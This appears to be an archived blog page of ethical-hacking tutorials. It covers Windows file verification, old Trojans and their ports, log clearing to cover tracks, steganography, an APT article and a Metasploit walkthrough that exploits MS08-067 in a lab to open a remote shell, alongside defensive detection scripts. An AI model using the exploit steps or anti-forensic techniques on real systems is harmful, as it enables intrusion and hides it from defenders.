266 posts in 'Hacking'

  1. 2011.09.13 Checking a System with System File Verification by CEOinIRVINE
  2. 2011.09.13 Trojan by CEOinIRVINE
  3. 2011.09.13 Covering Your Tracks and Erasing Evidence by CEOinIRVINE
  4. 2011.09.13 Steganography Technologies by CEOinIRVINE
  5. 2011.09.10 To Catch An APT by CEOinIRVINE
  6. 2011.09.09 Metasploit by CEOinIRVINE 1
  7. 2011.09.08 Conducting an Insider Attack by CEOinIRVINE
  8. 2011.09.07 "Apache Killer" a DDoS using the Range HTTP Header by CEOinIRVINE
  9. 2011.08.31 What is a SYN Flooding attack? by CEOinIRVINE 1
  10. 2011.08.31 How to prepare for DDoS by CEOinIRVINE 1

Checking a System with System File Verification

Windows 2000, XP and Server 2003 include a feature called Windows File Protection (WFP) that prevents the replacement of protected system files. WFP checks the file's integrity when an attempt is made to overwrite a SYS, DLL, OCX, TTF, or EXE file that it protects, and restores the original from its cache if the new file is not one Microsoft has signed. This ensures that only Microsoft-verified files are used to replace protected system files.

Another tool, sigverif (File Signature Verification), lists which files on the system carry a Microsoft digital signature and which do not; an unsigned file sitting where a signed system binary should be is a lead worth chasing. We will use this tool in the following procedure.

Signature Verification

We will run sigverif, a signature verification checker, and compare the results to the currently running processes in Task Manager:

  1. Press Ctrl+Alt+Del and select Start Task Manager.

  2. Click the Processes tab. Note any unusual processes and the amount of CPU time they are using. A process that consistently uses a high percentage of CPU time may indicate a virus or Trojan infection, though it may just as well be a busy legitimate program, so treat it as a lead to cross-check against the signature report, not as a verdict.



  3. Click the Performance tab in Task Manager to view the current CPU usage.



  4. Click Start, then Run.

  5. Type sigverif and click OK. When the File Signature Verification window opens, click Start to scan the system.



  6. In the sigverif program, choose Advanced to control what is scanned and where the signature verification report is logged.



  7. Click the View Log button to see the report.




System File Checker (sfc) is another command-line tool for checking whether a Trojan program has replaced protected files. If System File Checker detects that a file has been overwritten, it retrieves a known good copy from the Windows\system32\dllcache folder and overwrites the unverified file. Run it from an administrator command prompt with sfc /scannow. Note that both WFP and sfc only cover files Microsoft protects: a Trojan dropped under a new name is not a replacement of anything and will not be reported.
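The same idea as WFP and sfc, a known-good baseline compared against the current state of the files, written out as an added example for this post (it is not Microsoft's code and does not read dllcache). It records a SHA-256 digest for every file with a protected extension under a root you choose, then reports what was replaced, removed, or newly added. The directory tree in demo() is constructed in a temporary folder; the file names and contents are made up.

```python
"""Hash-baseline file verification, added example (not part of the original post).
Snapshot a directory tree once from a known-good system, later compare, and
report replaced, missing and added binaries. The 'added' category is the one
WFP and sfc cannot give you: a dropped-in backdoor replaces nothing."""
import hashlib
import os
import tempfile

# Extensions Windows File Protection watches, per the text above.
PROTECTED_EXTS = (".sys", ".dll", ".ocx", ".ttf", ".exe")


def sha256_of(path, chunk=1 << 16):
    """Stream a file through SHA-256 so large binaries are not loaded whole."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def build_baseline(root, exts=PROTECTED_EXTS):
    """Map relative path -> digest for every protected-extension file under root.
    Take this snapshot on a trusted system; it plays the role dllcache plays for sfc."""
    baseline = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.lower().endswith(exts):
                full = os.path.join(dirpath, name)
                baseline[os.path.relpath(full, root)] = sha256_of(full)
    return baseline


def verify(root, baseline, exts=PROTECTED_EXTS):
    """Compare the tree against the baseline and bucket the differences."""
    current = build_baseline(root, exts)
    return {
        "modified": sorted(p for p in baseline if p in current and current[p] != baseline[p]),
        "missing": sorted(p for p in baseline if p not in current),
        "added": sorted(p for p in current if p not in baseline),
    }


def demo():
    """Run the check on a constructed tree: notepad.exe replaced (the trick the
    Trojan post on this page describes), a new binary dropped in, one file deleted.
    All names and contents here are made up for the demonstration."""
    with tempfile.TemporaryDirectory() as root:
        sys32 = os.path.join(root, "system32")
        os.makedirs(sys32)
        originals = {"notepad.exe": b"MZ original notepad",
                     "kernel32.dll": b"MZ kernel32",
                     "readme.txt": b"not a protected file type"}
        for name, body in originals.items():
            with open(os.path.join(sys32, name), "wb") as f:
                f.write(body)
        baseline = build_baseline(root)

        with open(os.path.join(sys32, "notepad.exe"), "wb") as f:   # replaced
            f.write(b"MZ something else posing as notepad")
        with open(os.path.join(sys32, "tini.exe"), "wb") as f:      # dropped in
            f.write(b"MZ backdoor")
        os.remove(os.path.join(sys32, "kernel32.dll"))              # deleted
        return verify(root, baseline)


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(f"{kind}: {paths}")
```

Store the baseline off the machine you are checking (a Trojan with administrator rights can rewrite a local baseline as easily as the binaries), and remember that a matching digest only proves the file is unchanged since the snapshot, not that the snapshot itself was clean.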

Other posts in the 'Hacking' category

Directory Traversal Vulnerability  (0) 2011.10.29
WOT vs SiteAdvisor vs SafeWeb – PrizeFly  (0) 2011.10.19
Trojan  (0) 2011.09.13
Covering Your Tracks and Erasing Evidence  (0) 2011.09.13
Steganography Technologies  (0) 2011.09.13
Posted by CEOinIRVINE

Trojan

Hacking 2011. 9. 13. 08:44
TROJ_QAZ is a Trojan that renames the application notepad.exe file to note.com and then copies itself as notepad.exe to the Windows folder. This will cause the Trojan to be launched every time a user runs Notepad. It has a backdoor that a remote user or hacker can use to connect to and control the computer using port 7597. TROJ_QAZ also infects the Registry so that it is loaded every time Windows is started.

Tini is a small and simple backdoor Trojan for Windows operating systems. It listens on port 7777 and gives a hacker a remote command prompt on the target system. To connect to a Tini server, the hacker telnets to port 7777.

Donald Dick is a backdoor Trojan for Windows OSs that allows a hacker full access to a system over the Internet. The hacker can read, write, delete, or run any program on the system. Donald Dick also includes a keylogger and a Registry parser, and can perform functions such as opening or closing the CD-ROM tray. The attacker uses the client to send commands to the victim listening on a predefined port. Donald Dick uses default port 23476 or 23477.

NetBus is a Windows GUI Trojan program and is similar in functionality to Donald Dick. It adds the Registry key HKEY_CURRENT_USER\NetBus Server and modifies the HKEY_CURRENT_USER\NetBus Server\General\TCPPort key. If NetBus is configured to start automatically, it adds a Registry entry called NetBus Server Pro in HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices.

SubSeven is a Trojan that can be configured to notify a hacker when the infected computer connects to the Internet and can tell the hacker information about the system. This notification can be done over an IRC network, by ICQ, or by email. SubSeven can cause a system to slow down, and generates error messages on the infected system.

Back Orifice 2000 is a remote administration tool that an attacker can use to control a system across a TCP/IP connection using a GUI interface. Back Orifice doesn't appear in the task list or list of processes, and it registers itself in the Registry to run every time the computer is started. The filename it runs under is configurable before it's installed. Back Orifice modifies the HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices Registry key. Back Orifice plug-ins add features to the program, including cryptographically strong Triple DES encryption, a remote desktop with optional mouse and keyboard control, drag-and-drop encrypted file transfers, Explorer-like file system browsing, graphical remote Registry editing, reliable UDP and ICMP communications protocols, and stealth capabilities achieved by using ICMP instead of TCP and UDP.

BoSniffer appears to be a fix for Back Orifice but is actually a Back Orifice server with the SpeakEasy plug-in installed. If BoSniffer.exe, the BoSniffer executable, is run on a target system, it attempts to log on to a predetermined IRC server on channel #BO_OWNED with a random username. It then proceeds to announce its IP address and a custom message every few minutes so that the hacker community can use this system as a zombie for future attacks.

ComputerSpy Key Logger is a program that a hacker can use to record computer activities on a computer, such as websites visited; logins and passwords for ICQ, MSN, AOL, AIM, and Yahoo! Messenger or webmail; current applications that are running or executed; Internet chats; and email. The program can even take snapshots of the entire Windows desktop at set intervals.

Beast is a Trojan that runs in the memory allocated for the WinLogon.exe service. Once installed, the program inserts itself into Windows Explorer or Internet Explorer. One of Beast's most distinct features is that it's an all-in-one Trojan, meaning the client, the server, and the server editor are stored in the same application.

CyberSpy is a telnet Trojan that copies itself into the Windows system directory and registers itself in the system Registry so that it starts each time an infected system is rebooted. Once this is done, it sends a notice via email or ICQ and then begins to listen to a previously specified TCP/IP port.

Subroot is a remote administration Trojan that a hacker can use to connect to a victim system on TCP port 1700.

LetMeRule! is a remote access Trojan that can be configured to listen on any port on a target system. It includes a command prompt that an attacker uses to control the target system. It can delete all files in a specific directory, execute files on the remote host, or view and modify the Registry.

Firekiller 2000 disables antivirus programs and software firewalls. For instance, if Norton AntiVirus is in auto scan mode in the Taskbar, and AtGuard Firewall is activated, the program stops both on execution and makes the installations of both unusable on the hard drive. They must then be reinstalled to restore their functionality. Firekiller 2000 works with all major protection software, including AtGuard, Norton AntiVirus, and McAfee Antivirus.

The Hard Drive Killer Pro programs offer the ability to fully and permanently destroy all data on any given DOS or Windows system. The program, once executed, deletes files and infects and reboots the system within a few seconds. After rebooting, all hard drives attached to the system are formatted in an unrecoverable manner within only one to two seconds, regardless of the size of the hard drive.
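Several of the backdoors above announce themselves by a fixed listening port (TROJ_QAZ on 7597, Tini on 7777, Donald Dick on 23476/23477, Subroot on 1700). The following is an added example, not from the original post, that checks the output of netstat -ano for those ports. The netstat text is a constructed sample in the column layout Windows prints; NetBus and Back Orifice 2000 take their port from configuration and so are deliberately absent from the table.

```python
"""Hunting the backdoors described above by their default ports in `netstat -ano`
output. Added example, not part of the original post; the sample output below
is constructed and the port table is taken from the descriptions in the text."""

TROJAN_PORTS = {
    7597: "TROJ_QAZ backdoor",
    7777: "Tini",
    23476: "Donald Dick",
    23477: "Donald Dick",
    1700: "Subroot",
}

# Constructed sample in the column layout netstat -ano prints on XP/2003.
SAMPLE_NETSTAT = """
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       896
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:7777           0.0.0.0:0              LISTENING       1540
  TCP    192.168.1.6:7597       192.168.1.4:52011      ESTABLISHED     2208
  TCP    192.168.1.6:1033       10.0.0.5:23476         ESTABLISHED     3100
  UDP    0.0.0.0:123            *:*                                    1020
"""


def _port(addr):
    """Port number from 'host:port' or '[v6]:port'; None for '*:*'."""
    tail = addr.rsplit(":", 1)[-1]
    return int(tail) if tail.isdigit() else None


def parse_netstat(text):
    """Turn netstat -ano output into dicts. UDP rows have no State column."""
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if not parts or parts[0] not in ("TCP", "UDP"):
            continue                      # banner and header lines
        if parts[0] == "TCP" and len(parts) == 5:
            proto, local, remote, state, pid = parts
        elif parts[0] == "UDP" and len(parts) == 4:
            proto, local, remote, pid = parts
            state = ""
        else:
            continue                      # unexpected layout: skip rather than guess
        rows.append({"proto": proto, "local": local, "remote": remote,
                     "state": state, "pid": int(pid)})
    return rows


def find_trojan_activity(rows):
    """Classify each row: a listener on a Trojan port, an established session to
    a local Trojan port (someone is already connected), or this host connecting
    out to a Trojan port elsewhere (this host may be the attacker's machine)."""
    hits = []
    for r in rows:
        lport, rport = _port(r["local"]), _port(r["remote"])
        if lport in TROJAN_PORTS:
            role = "listener" if r["state"] in ("LISTENING", "") else "session"
            hits.append({"pid": r["pid"], "port": lport,
                         "trojan": TROJAN_PORTS[lport], "role": role})
        elif rport in TROJAN_PORTS:
            hits.append({"pid": r["pid"], "port": rport,
                         "trojan": TROJAN_PORTS[rport], "role": "client"})
    return hits


if __name__ == "__main__":
    for hit in find_trojan_activity(parse_netstat(SAMPLE_NETSTAT)):
        print(f"PID {hit['pid']:>5}  port {hit['port']:>5}  {hit['role']:<8} {hit['trojan']}")
```

A port match is a lead, not proof: any program can bind 7777. Tie the PID to its image with tasklist /FI "PID eq 1540" and check that image with the signature procedure from the file-verification post before calling it a Trojan.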

Posted by CEOinIRVINE

Covering Your Tracks and Erasing Evidence

Once intruders have successfully gained administrator access on a system, they try to cover their tracks to prevent detection of their presence (either current or past) on the system. A hacker may also try to remove evidence of their identity or activities on the system to prevent tracing of their identity or location by authorities. To prevent detection, the hacker usually erases any error messages or security events that have been logged. Disabling auditing and clearing the event log are two methods used by a hacker to cover their tracks and avoid detection.

The first thing intruders do after gaining administrator privileges is disable auditing. Windows auditing records selected events, such as logons, application events, and system events, in the event logs viewed with Event Viewer. An administrator chooses the level of logging implemented on a system. Hackers want to determine the level of logging implemented to see whether they need to clear events that indicate their presence on the system.

Hacking Tool

Auditpol is a tool included in the Windows NT Resource Kit for system administrators (from Windows Vista onward, auditpol.exe ships with the operating system itself). It can disable or enable auditing from the Windows command line, and it can also be used to determine the level of logging implemented by a system administrator.


Intruders can easily wipe out the security log in the Windows Event Viewer. An event log that contains only one or a few events is suspicious because it usually indicates that other events have been cleared. It's still necessary to clear the event log after disabling auditing, because changing the audit policy with Auditpol itself places an entry in the event log indicating that auditing has been disabled. Clearing the log is logged as well (event 517 on NT/2000/XP/2003, 1102 on Vista and later), so a wiped log starts with a "log cleared" record rather than looking clean. Several tools exist to clear the event log, or a hacker can do so manually in the Windows Event Viewer.

Hacking Tools

The elsave.exe utility is a simple tool for clearing the event log. It's command line based.

WinZapper is a tool that an attacker can use to erase event records selectively from the security log in Windows 2000. WinZapper also ensures that no security events are logged while the program is running.

Evidence Eliminator is a data-cleansing system for Windows PCs. It prevents unwanted data from becoming permanently hidden in the system. It cleans the Recycle Bin, Internet cache, system files, temp folders, and so on. Evidence Eliminator can also be used by a hacker to remove evidence from a system after an attack.
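From the defender's side, the two moves described above leave a recognisable pair of records. The following is an added example, not from the original post, that looks for them in an exported Security log: event 612 (NT/2000/XP/2003) or 4719 (Vista and later) for an audit policy change, event 517 or 1102 for the log being cleared, the two in quick succession, and a log that is suspiciously thin. The records are constructed; the account name and timestamps are made up.

```python
"""Spotting the track-covering sequence above (auditpol, then clear the log) in
an exported Security log. Added example, not part of the original post.
Event IDs 612/517 are the NT/2000/XP/2003 IDs for 'audit policy changed' and
'audit log cleared'; 4719/1102 are the same events on Vista and later.
The sample records below are constructed."""
from datetime import datetime, timedelta

AUDIT_POLICY_CHANGED = {612, 4719}
LOG_CLEARED = {517, 1102}

# Constructed sample: (timestamp, event id, account, description)
SAMPLE_EVENTS = [
    ("2011-09-13 01:58:03", 4624, "ACME\\jdoe", "An account was successfully logged on"),
    ("2011-09-13 02:01:17", 4719, "ACME\\jdoe", "System audit policy was changed"),
    ("2011-09-13 02:01:40", 1102, "ACME\\jdoe", "The audit log was cleared"),
    ("2011-09-13 02:02:05", 4624, "ACME\\jdoe", "An account was successfully logged on"),
]


def parse_events(records):
    """Turn the exported tuples into dicts with real datetimes."""
    return [{"ts": datetime.strptime(ts, "%Y-%m-%d %H:%M:%S"),
             "id": eid, "who": who, "msg": msg} for ts, eid, who, msg in records]


def analyse(events, min_events=50, window=timedelta(minutes=10)):
    """Return human-readable findings. Both records are written by the event log
    service itself rather than by the audited program, which is why a wiped log
    still opens with the clear event and why a near-empty log is a red flag."""
    findings = []
    clears = [e for e in events if e["id"] in LOG_CLEARED]
    changes = [e for e in events if e["id"] in AUDIT_POLICY_CHANGED]
    for e in clears:
        findings.append(f"{e['ts']} log cleared by {e['who']} (event {e['id']})")
    for e in changes:
        findings.append(f"{e['ts']} audit policy changed by {e['who']} (event {e['id']})")
    # A policy change followed shortly by a clear is exactly the sequence described above.
    for p in changes:
        for c in clears:
            if timedelta(0) <= c["ts"] - p["ts"] <= window:
                findings.append(f"policy change at {p['ts']} followed by log clear "
                                f"at {c['ts']} within {window}: track-covering pattern")
    if len(events) < min_events:
        findings.append(f"only {len(events)} events in the log: possible earlier clearing")
    return findings


if __name__ == "__main__":
    for finding in analyse(parse_events(SAMPLE_EVENTS)):
        print(finding)
```

Forward the Security log to a collector the intruder cannot reach; WinZapper-style selective deletion only works on the copy that sits on the compromised host.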

Posted by CEOinIRVINE

Steganography Technologies

Hacking 2011. 9. 13. 08:28

Understanding Steganography Technologies

Steganography is the process of hiding data inside other data, such as images, audio files, or text, so that the carrier appears unchanged. The most popular method is to use graphic images as hiding places. Attackers can embed any information in a graphic file using steganography: directions for making a bomb, a secret bank account number, or answers to a test. Any text imaginable can be hidden in an image. In Exercise 4.3 you will use ImageHide to hide text within an image.

Hacking Tools

ImageHide is a steganography program that hides large amounts of text in images. Because the data is written into existing pixel values, adding bytes of data does not increase the image size, and the image looks the same in a normal graphics program. It loads and saves ordinary image files, so the result passes most email content scanners.

Blindside is a steganography application that hides information inside BMP (bitmap) images. It's a command-line utility.

MP3Stego hides information in MP3 files during the compression process. The data is compressed, encrypted, and then hidden in the MP3 bitstream.

Snow is a whitespace steganography program that conceals messages in ASCII text by appending whitespace to the end of lines. Because spaces and tabs generally aren't visible in text viewers, the message is effectively hidden from casual observers. If the built-in encryption is used, the message can't be read even if it's detected.

CameraShy works with Windows and Internet Explorer and lets users share censored or sensitive information stored in an ordinary GIF image.

Stealth is a filtering tool for PGP files. It strips off identifying information from the header, after which the file can be used for steganography.


EXERCISE 4.3: Hiding Data in an Image Using ImageHide

To hide data in an image using ImageHide:

  1. Download and install the ImageHide program.

  2. Add an image in the ImageHide program.

  3. Add text in the field at the bottom of the ImageHide screen.

  4. Hide the text within the image using ImageHide.


Steganography can be detected by some programs, although doing so is difficult. The first step in detection is to locate files that may carry hidden data, which can be done by analyzing statistical patterns in the image data (least-significant-bit noise, for example) and changes to the color palette.
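The whitespace technique Snow uses, and the kind of pattern check the detection paragraph describes, written out as an added example for this post. This is not Snow's own code (Snow's bit packing and its optional ICE encryption are not reproduced): each carrier line gets a tab marker followed by eight spaces or tabs encoding one message byte, and the detector counts lines whose trailing whitespace mixes spaces and tabs, something legitimate text almost never does. The carrier text and message in the test are made up.

```python
"""Whitespace steganography in the style of Snow, plus a trailing-whitespace
detector. Added example, not the Snow tool itself. Bits are appended after a
tab marker: '1' -> tab, '0' -> space, invisible in most viewers."""

BITS_PER_LINE = 8   # one message byte per carrier line


def _to_bits(data: bytes) -> str:
    return "".join(f"{b:08b}" for b in data)


def embed(carrier: str, message: bytes) -> str:
    """Hide message in carrier; the visible text is left untouched.
    Raises ValueError when the carrier has fewer lines than message bytes."""
    lines = carrier.split("\n")
    bits = _to_bits(message)
    chunks = [bits[i:i + BITS_PER_LINE] for i in range(0, len(bits), BITS_PER_LINE)]
    if len(chunks) > len(lines):
        raise ValueError(f"carrier has {len(lines)} lines, message needs {len(chunks)}")
    out = []
    for i, line in enumerate(lines):
        line = line.rstrip(" \t")        # normalise so decoding is unambiguous
        if i < len(chunks):
            line += "\t" + "".join("\t" if b == "1" else " " for b in chunks[i])
        out.append(line)
    return "\n".join(out)


def extract(stego: str) -> bytes:
    """Recover the message: only lines whose trailing whitespace starts with the
    tab marker carry payload; everything else is ignored."""
    bits = ""
    for line in stego.split("\n"):
        body = line.rstrip(" \t")
        tail = line[len(body):]
        if not tail.startswith("\t"):
            continue
        bits += "".join("1" if c == "\t" else "0" for c in tail[1:])
    usable = len(bits) - len(bits) % 8
    return bytes(int(bits[i:i + 8], 2) for i in range(0, usable, 8))


def suspicious_trailing_whitespace(text: str) -> dict:
    """First-pass detector: how many lines end in whitespace, and how many of
    those mix spaces and tabs. Editors strip trailing whitespace or leave one
    kind; a mixture on several lines is the signature of this method."""
    lines = text.split("\n")
    tails = [l[len(l.rstrip(" \t")):] for l in lines]
    with_ws = sum(1 for t in tails if t)
    mixed = sum(1 for t in tails if " " in t and "\t" in t)
    return {
        "lines": len(lines),
        "trailing": with_ws,
        "mixed": mixed,
        "suspicious": bool(mixed >= 2 or (with_ws and with_ws / len(lines) > 0.5)),
    }


if __name__ == "__main__":
    carrier = "The quick brown fox\njumps over\nthe lazy dog\nfour\nfive\nsix"
    stego = embed(carrier, b"hi")
    print(repr(stego))
    print(extract(stego), suspicious_trailing_whitespace(stego))
```

The detector finds the carrier, not the message: with Snow's encryption turned on the extracted bytes are still ciphertext, which is the point the text makes about built-in encryption.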

Countermeasure Tools

Stegdetect is an automated tool for detecting steganographic content in images. It's capable of detecting different steganographic methods to embed hidden information in JPEG images.

Dskprobe is a low-level disk sector editor from the Support Tools on the Windows 2000 installation CD. It lets an analyst inspect raw sectors and slack space by hand; it does not detect steganography automatically.

Posted by CEOinIRVINE

To Catch An APT

Hacking 2011. 9. 10. 02:23


It's not about prosecuting the nameless, faceless attackers behind these relentless targeted attacks -- it's about minimizing the damage they incur

Sep 08, 2011 | 09:37 PM

By Kelly Jackson Higgins
Dark Reading
This is the second installment of a two-part series on security in the "Age Of The APT." Part one is here.

An advanced persistent threat (APT) attacker probably already has infiltrated your network: That's the new normal in security. But what can you do about it?

It's a matter of moving beyond the traditional mindset of thinking purely in terms of prevention. "We're trying to help people to think beyond intrusion prevention to post-infection detection and mitigation," says Will Irace, director of research for Fidelis.

Accepting the premise that the attackers are already inside can be unsettling -- even shocking -- to some organizations, but the reality is that these cyberespionage attacks have evolved from a military/Defense Department problem to one plaguing various corners of the commercial world as well. "Previously, it was the military, then it was government actors, then it was the Defense industrial base. We've seen the same actors continue to expand the number of their targets" to commercial firms in oil and gas, pharmaceuticals, and other areas, says Richard Bejtlich, CSO and vice president of managed services for Mandiant. "That to me is pretty amazing -- that they target so many different victims now."

Bejtlich says despite the ongoing and recurrent nature of these attacks, victim organizations eventually get better at staving them off. "The first time anyone deals with this, it's like nothing they’ve ever had to deal with before. That there is somebody out there after you, and they will not give up and will always keep trying to get back into your organization, is new for most people" to face, he says. "It may take [as long as] a couple of years, but we [ultimately] do see improvement" in how victim organizations defend against these targeted attacks.

Few of these attacks ever see the light of day in terms of public disclosure. A widespread cyberespionage attack targeting high-level officials at multiple civilian federal government agencies has been under way and under investigation for months now. The attackers used sophisticated malware and an SSL-encrypted connection for siphoning information from the targeted agencies, sending it back to their home servers.

The goal is to detect these types of attacks as quickly as possible, and to minimize the amount of exposure or loss of your intellectual property or trade secrets, for example. "How do you reduce the window of opportunity you have so they are not in your organization for weeks or months ... so you can detect them in a time frame of hours or days?" says Eddie Schwartz, CSO, at RSA Security. "That requires having access to all potential data related to the security problem."

Schwartz says unlike a traditional security event, with an APT-type attack you can't make a decision based on a single log or firewall event. "An end user account banging away at a system it normally doesn’t have access to," for instance, is just one piece of the targeted attack, he says.

"With an advanced attack, you have to ask, 'Is this part of something that has 10 to 12 other moving parts you need to track down and chase in the entire chain until we start killing it off [fully]?'" he says.

But these types of attacks are difficult to detect, and many organizations still rely solely on prevention-oriented tools, such as signature-based technology and firewalls. APT attackers tend to favor zero-day vulnerabilities, or exploit gaping holes within the targeted firm's infrastructure. The first step in most cases is to social-engineer an unsuspecting user, often with an email message purporting to be from someone he knows or within his industry, carrying a payload of a malicious attachment or URL that, when opened, gives the attacker a foot in the door.

The ideal defense against an APT attacker, security experts say, is a combination of the traditional preventative tools plus real-time monitoring of their networks and systems. But many tools today are looking at different pieces of the infrastructure, and making sense of all of the events and logs is often a painstakingly manual job. That just gives the attacker more time and opportunity to burrow further into the victim organization, often getting layers deep such that it's difficult to root them out.

Bottom line: There's no silver bullet today to defend and mitigate against these targeted attacks, experts say.

"Most of the monitoring tools historically deployed by enterprises lack the ability to get into the weeds and present meaningful information about the relationship between content and context. Was the file Alice posted to an image-sharing site really an image, or was it an exfiltration: an encrypted blob of data posing as an image? Is there malicious VBscript in the Microsoft Office file three layers down in a Zip archive that was mailed to my HR department?" Fidelis' Irace says. "It's not enough to discover such a thing 10 days after an infection through post-hoc forensic packet analysis: We need technologies that are able to spot and kill that stuff in real-time."

Network behavioral-anomaly detection tools can help, he says, but not with content. Intrusion-prevention systems can catch some things, but don't look at the payloads, he says. "Moreover, they're optimized for defending against packet-based attacks on servers, not payload-based attacks on clients. Sandboxing technologies are helpful after the fact, but they don't provide real-time awareness or protection," Irace says.

And packet-capture tools are good for postmortem investigation. "But like sandboxing technologies, [they] can't help enterprises get into the APT fight in real-time," Irace says.


Posted by CEOinIRVINE

Metasploit

Hacking 2011. 9. 9. 09:52

Using the Metasploit Console to Launch Exploits

Our first Metasploit demo exploits MS08-067, the Windows Server service vulnerability that the Conficker worm used in late 2008 and early 2009, against an unpatched Windows XP machine. We’ll use Metasploit to get a remote command shell on it. Metasploit can pair any Windows exploit with any compatible Windows payload, so we can use the MS08-067 vulnerability to open a command shell, create an administrator, start a remote VNC session, or do a bunch of other things discussed later in the chapter. Let’s get started.

$ ./msfconsole
                     888                           888        d8b888
                     888                           888        Y8P888
                     888                           888           888
88888b.d88b.  .d88b. 888888 8888b. .d8888b 88888b. 888 .d88b. 888888888
888 "888 "88bd8P  Y8b888       "88b88K     888 "88b888d88""88b888888
888  888  88888888888888   .d888888"Y8888b.888  888888888  888888888
888  888  888Y8b.    Y88b. 888  888     X88888 d88P888Y88..88P888Y88b.
888  888  888 "Y8888  "Y888"Y888888 88888P'88888P" 888 "Y88P" 888 "Y888
                                           888
                                           888
                                           888
        =[ metasploit v3.4.0-dev [core:3.4 api:1.0]
+ -- --=[ 317 exploits - 93 auxiliary
+ -- --=[ 216 payloads - 20 encoders - 6 nops
        =[ svn r9114 updated today (2010.04.20)
msf >

The interesting commands to start with are

show <exploits | payloads>
info <exploit | payload> <name>
use <exploit-name>

You’ll find all the other commands by typing help or ?. To launch an MS08-067 exploit, we’ll first need to find the Metasploit name for this exploit. We can use the search command to do so:

msf > search ms08-067
[*] Searching loaded modules for pattern 'ms08-067'…
Exploits
========
   Name                         Rank   Description
   ----                         ----   -----------
   windows/smb/ms08_067_netapi  great  Microsoft Server Service Relative Path
                                       Stack Corruption

The Metasploit name for this exploit is windows/smb/ms08_067_netapi. We’ll use that exploit and then go looking for all the options needed to make the exploit work:

msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) >

Notice that the prompt changes to enter “exploit mode” when you use an exploit module. Any options or variables you set while configuring this exploit will be retained so that you don’t have to reset the options every time you run it. You can get back to the original launch state at the main console by issuing the back command:

msf exploit(ms08_067_netapi) > back
msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) >

Different exploits have different options. Let’s see what options need to be set to make the MS08-067 exploit work:

msf exploit(ms08_067_netapi) > show options
Module options:
   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST                     yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

This exploit requires a target address, the port number on which SMB (Server Message Block) listens, and the name of the pipe exposing this functionality:

msf exploit(ms08_067_netapi) > set RHOST 192.168.1.6
RHOST => 192.168.1.6

As you can see, the syntax to set an option is as follows:

set <OPTION-NAME> <option>

Note

Earlier versions of Metasploit were particular about the case of the option name and option, so examples in this chapter always use uppercase if the option is listed in uppercase.


With the exploit module set, we next need to set the payload. The payload is the action that happens after the vulnerability is exploited. It’s like choosing how you want to interact with the compromised machine if the vulnerability is triggered successfully. For this first example, let’s use a payload that simply opens a command shell listening on a TCP port:

msf exploit(ms08_067_netapi) > search "Windows Command Shell"
[*] Searching loaded modules for pattern 'Windows Command Shell'…
Compatible Payloads
===================
   Name                                Rank    Description
   ----                                ----    -----------
   windows/shell/bind_ipv6_tcp         normal  Windows Command Shell, Bind TCP
                                               Stager (IPv6)
   windows/shell/bind_nonx_tcp         normal  Windows Command Shell, Bind TCP
                                               Stager (No NX Support)
   windows/shell/bind_tcp              normal  Windows Command Shell, Bind TCP
                                                Stager
   windows/shell/reverse_ipv6_tcp      normal  Windows Command Shell, Reverse
                                               TCP Stager (IPv6)
   windows/shell/reverse_nonx_tcp      normal  Windows Command Shell, Reverse
                                               TCP Stager (No NX Support)
   windows/shell/reverse_ord_tcp       normal  Windows Command Shell, Reverse
                                               Ordinal TCP Stager
   windows/shell/reverse_tcp           normal  Windows Command Shell, Reverse
                                               TCP Stager
   windows/shell/reverse_tcp_allports  normal  Windows Command Shell, Reverse
                                               All-Port TCP Stager
   windows/shell/reverse_tcp_dns       normal  Windows Command Shell, Reverse
                                               TCP Stager (DNS)
   windows/shell_bind_tcp              normal  Windows Command Shell, Bind TCP
                                               Inline
   windows/shell_reverse_tcp           normal  Windows Command Shell, Reverse TCP
                                               Inline

In typical gratuitous Metasploit style, there are 11 payloads that provide a Windows command shell. Some open a listener on the host, some cause the host to “phone home” to the attacking workstation, some use IPv6, some set up the command shell in one network roundtrip (“inline”), while others utilize multiple roundtrips (“staged”). One even connects back to the attacker tunneled over DNS. This Windows XP target virtual machine does not have a firewall enabled, so we’ll use the simple windows/shell/bind_tcp payload:

msf exploit(ms08_067_netapi) > set PAYLOAD windows/shell/bind_tcp

If the target were running a firewall, we might instead choose a payload that causes the compromised workstation to connect back to the attacker (“reverse”). With the bind payload selected, show options now lists the payload's own settings below the module's:

msf exploit(ms08_067_netapi) > show options
Module options:
   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    192.168.1.6      yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/shell/bind_tcp):
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: seh, thread, process
   LPORT     4444             yes       The local port
   RHOST     192.168.1.6      no        The target address
By default, this payload opens a listener on TCP port 4444 on the target, to which Metasploit then connects for the command shell. Let’s attempt the exploit:

msf exploit(ms08_067_netapi) > exploit
[*] Started bind handler
[*] Automatically detecting the target…
[*] Fingerprint: Windows XP Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Attempting to trigger the vulnerability…
[*] Sending stage (240 bytes) to 192.168.1.6
[*] Command shell session 1 opened (192.168.1.4:49623 -> 192.168.1.6:4444)
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>echo w00t!
echo w00t!
w00t!

It worked! We can verify the connection by issuing the netstat command from the Windows XP machine console, looking for established connections on port 4444:

C:\>netstat -ano | findstr 4444 | findstr ESTABLISHED
  TCP    192.168.1.6:4444       192.168.1.4:49623      ESTABLISHED 964

